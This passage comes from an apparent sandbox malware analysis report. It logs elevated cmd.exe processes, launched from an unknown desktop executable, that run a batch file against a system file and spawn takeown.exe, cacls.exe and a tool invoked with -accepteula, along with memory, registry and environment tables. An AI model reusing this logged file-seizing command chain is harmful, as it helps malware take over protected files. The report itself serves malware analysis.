| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 80 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 16 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 54 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 152, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (4)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0x570, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | C:\Windows\system32\takeown.exe | os_pid = 0x494, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 | |
| Create | cmd.exe | - |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0x94c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (51)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
15 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
6 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
7 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
5 | |
| Get Environment String | name = FN, result_out = "Music.jtp" |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
2 | |
| Set Environment String | name = COPYCMD |
|
3 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
2 | |
| Set Environment String | name = =ExitCodeAscii |
|
3 | |
| Set Environment String | name = FN, value = "Music.jtp" |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 |
Process #115: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #115 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c G13k6QZj.exe -accepteula "blank.jtp" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:29, Reason: Child Process |
| Unmonitor | End Time: 00:02:44, Reason: Self Terminated |
| Monitor Duration | 00:00:15 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x3c8 |
| Parent PID | 0x40 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
608
0x
D28
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000a10000 | 0x00a10000 | 0x04a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004a10000 | 0x04a10000 | 0x04a2ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a10000 | 0x04a10000 | 0x04a1ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004a20000 | 0x04a20000 | 0x04a23fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a30000 | 0x04a30000 | 0x04a31fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a30000 | 0x04a30000 | 0x04a33fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a40000 | 0x04a40000 | 0x04a53fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004a60000 | 0x04a60000 | 0x04a9ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004aa0000 | 0x04aa0000 | 0x04b9ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ba0000 | 0x04ba0000 | 0x04ba3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004bb0000 | 0x04bb0000 | 0x04bb0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004bc0000 | 0x04bc0000 | 0x04bc1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004bf0000 | 0x04bf0000 | 0x04bfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c00000 | 0x04c00000 | 0x04edffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04c00000 | 0x04cbdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004cc0000 | 0x04cc0000 | 0x04cfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004de0000 | 0x04de0000 | 0x04edffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ee0000 | 0x04ee0000 | 0x04fdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004fe0000 | 0x04fe0000 | 0x0512ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05130000 | 0x05466fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ed60000 | 0x7ed60000 | 0x7ee5ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ee60000 | 0x7ee60000 | 0x7ee82fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ee85000 | 0x7ee85000 | 0x7ee85fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee89000 | 0x7ee89000 | 0x7ee8bfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee8c000 | 0x7ee8c000 | 0x7ee8efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee8f000 | 0x7ee8f000 | 0x7ee8ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 120, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\G13k6QZj.exe | os_pid = 0xe08, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x930000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75260000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x752a2780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7527fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7527a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74f835c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #116: cmd.exe
353
0
| Information | Value |
|---|---|
| ID | #116 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" "C:\Program Files\Windows Photo Viewer\en-US\ImagingDevices.exe.mui"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:02:30, Reason: Child Process |
| Unmonitor | End Time: 00:02:56, Reason: Self Terminated |
| Monitor Duration | 00:00:26 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xf0 |
| Parent PID | 0xda0 (c:\users\ciihmnxmn6ps\desktop\cary.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
CE4
0x
AEC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000050000 | 0x00050000 | 0x0006ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x0005ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00063fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00071fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x00073fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000080000 | 0x00080000 | 0x00093fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x000dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x001dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001f0000 | 0x001f0000 | 0x001f0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x00201fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0025ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000270000 | 0x00270000 | 0x0027ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0049ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00280000 | 0x0033dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x0049ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004a0000 | 0x004a0000 | 0x0059ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005a0000 | 0x005a0000 | 0x0078ffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x00930000 | 0x0097ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000980000 | 0x00980000 | 0x0497ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x04980000 | 0x04cb6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x64ae0000 | 0x64ae7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x64af0000 | 0x64b62fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x64b70000 | 0x64bbefff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x748d0000 | 0x748d7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74d40000 | 0x74d98fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x74da0000 | 0x74da9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x74db0000 | 0x74dcdfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74e70000 | 0x74fe5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75260000 | 0x7534ffff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x76a10000 | 0x76a8afff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x76c40000 | 0x76c82fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x76d90000 | 0x76e3bfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x779f0000 | 0x77aadfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77ca0000 | 0x77e18fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ee50000 | 0x7ee50000 | 0x7ef4ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ef50000 | 0x7ef50000 | 0x7ef72fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ef73000 | 0x7ef73000 | 0x7ef73fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef76000 | 0x7ef76000 | 0x7ef76fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef7a000 | 0x7ef7a000 | 0x7ef7cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef7d000 | 0x7ef7d000 | 0x7ef7ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7df8ee37ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007df8ee380000 | 0x7df8ee380000 | 0x7ff8ee37ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ff8ee380000 | 0x7ff8ee541fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ff8ee542000 | 0x7ff8ee542000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (271)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
2 | |
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
3 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
4 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\nxKiITHe.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
39 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | - | type = file_type |
|
3 | |
| Get Info | G13k6QZj.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
132 | |
| Open | STD_INPUT_HANDLE | - |
|
8 | |
| Open | - | - |
|
4 | |
| Open | - | - |
|
11 | |
| Open | - | - |
|
12 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Read | - | size = 8191, size_out = 194 |
|
1 | |
| Read | - | size = 8191, size_out = 179 |
|
1 | |
| Read | - | size = 8191, size_out = 163 |
|
1 | |
| Read | - | size = 8191, size_out = 148 |
|
1 | |
| Read | - | size = 8191, size_out = 0 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
15 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
6 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 94 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 7 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 73 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 3 |
|
3 | |
| Write | STD_OUTPUT_HANDLE | size = 29 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 37 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 32 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 67 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 1 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 12 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 38 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 32, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
